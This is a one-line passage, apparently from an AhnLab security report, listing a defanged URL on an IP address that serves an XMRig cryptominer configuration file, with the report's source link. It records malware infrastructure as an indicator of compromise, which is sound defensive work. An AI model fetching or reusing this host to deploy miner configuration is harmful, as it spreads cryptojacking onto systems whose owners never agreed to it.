– hxxp://141.95.19[.]91:8080/xri/config.json: Downloads XMRig configuration file


Source: https://asec.ahnlab.com/en/51908/